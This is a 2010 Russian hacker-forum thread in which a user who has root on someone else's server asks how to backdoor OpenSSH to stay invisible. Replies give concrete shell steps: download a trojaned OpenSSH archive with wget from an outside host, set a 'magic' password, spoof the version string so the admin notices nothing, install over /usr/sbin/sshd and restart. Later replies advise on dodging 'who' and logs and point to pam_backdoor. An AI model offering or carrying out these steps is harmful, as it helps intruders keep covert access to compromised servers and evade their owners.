ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нужна помощь в затроянивании OpenSSH
  #1  
Старый 14.06.2010, 15:42
Аватар для buncho
buncho
Новичок
Регистрация: 02.06.2010
Сообщений: 18
Провел на форуме:
62243

Репутация: 0
Smile Нужна помощь в затроянивании OpenSSH

Есть рут. Хочу стать невидимым Думаю оптимальным решением станет затроянивание SSH. Стоит OpenSSH_4.3p2. В сети нашел патч только для версий 4.4 и выше. Сам вникать и писать код пока не хочу. Кто может чем помочь?
 
Ответить с цитированием

  #2  
Старый 14.06.2010, 16:52
Аватар для slashd
slashd
Новичок
Регистрация: 03.09.2008
Сообщений: 16
Провел на форуме:
82824

Репутация: 6
По умолчанию

В файле version.h указать нужную версию, в includes.h прописать магический пароль вместо mAgic_p1ple. Перед make install не забыть сбекапить куда-нибудь /usr/bin/ssh и /usr/sbin/sshd.
Код:
# cd /tmp
# wget http://tools.xaker.ru/rulezzz.tar.gz.txt -O rul.tgz
# tar zxf rul.tgz
# cd openssh*
# vim version.h
# vim includes.h
# ./configure --sbindir=/usr/sbin --bindir=/usr/bin --with-pam --sysconfdir=/etc/ssh
# make && make install
# /etc/init.d/sshd restart
 
Ответить с цитированием

  #3  
Старый 14.06.2010, 17:13
Аватар для buncho
buncho
Новичок
Регистрация: 02.06.2010
Сообщений: 18
Провел на форуме:
62243

Репутация: 0
По умолчанию

Спасибо, а ничего что там версия 4.7?

kill -9 $$

да чтоб в логи не писалось и мэджик пасс был.

кстати если админ наберет команду who, то я спалюсь все равно?

и еще тупой вопрос: если демон не запуститься изза какой-либо ошибки, то всё, хана?

Последний раз редактировалось buncho; 14.06.2010 в 17:21..
 
Ответить с цитированием

  #4  
Старый 14.06.2010, 19:25
Аватар для slashd
slashd
Новичок
Регистрация: 03.09.2008
Сообщений: 16
Провел на форуме:
82824

Репутация: 6
По умолчанию

Цитата:
Сообщение от kill -9 $$  
ссш с сюрпризом или без? фпаду сурс смотреть
Без сюрпризов


Цитата:
Сообщение от buncho  
кстати если админ наберет команду who, то я спалюсь все равно?
Если войдёшь под магическим паролем, то не спалишься.

Цитата:
Сообщение от buncho  
и еще тупой вопрос: если демон не запуститься изза какой-либо ошибки, то всё, хана?
Если такое произойдёт, то восстанавливай из бекапа файлы sshd и ssh, затем перезапускай сервер.
 
Ответить с цитированием

  #5  
Старый 14.06.2010, 20:06
Аватар для diehard
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

а какая тебе разница, что за версия там? Исправь в сорцах версию на ту что на сервере, админ разницы не почуствует.
 
Ответить с цитированием

  #6  
Старый 14.06.2010, 20:52
Аватар для buncho
buncho
Новичок
Регистрация: 02.06.2010
Сообщений: 18
Провел на форуме:
62243

Репутация: 0
По умолчанию

Цитата:
Сообщение от slashd  
Если такое произойдёт, то восстанавливай из бекапа файлы sshd и ssh, затем перезапускай сервер.
так я ж по ssh сам на сервак захожу. если сервис вырубится как я тогда зайду?
 
Ответить с цитированием

  #7  
Старый 14.06.2010, 21:28
Аватар для slashd
slashd
Новичок
Регистрация: 03.09.2008
Сообщений: 16
Провел на форуме:
82824

Репутация: 6
По умолчанию

При рестарте sshd конекты не рвутся, так что есть возможность всё исправить.
 
Ответить с цитированием

  #8  
Старый 15.06.2010, 12:25
Аватар для svesve
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

юзайте pam_backdoor меньше гемора.

тыц
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна ваще помощь XP jks Windows 12 22.01.2009 00:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ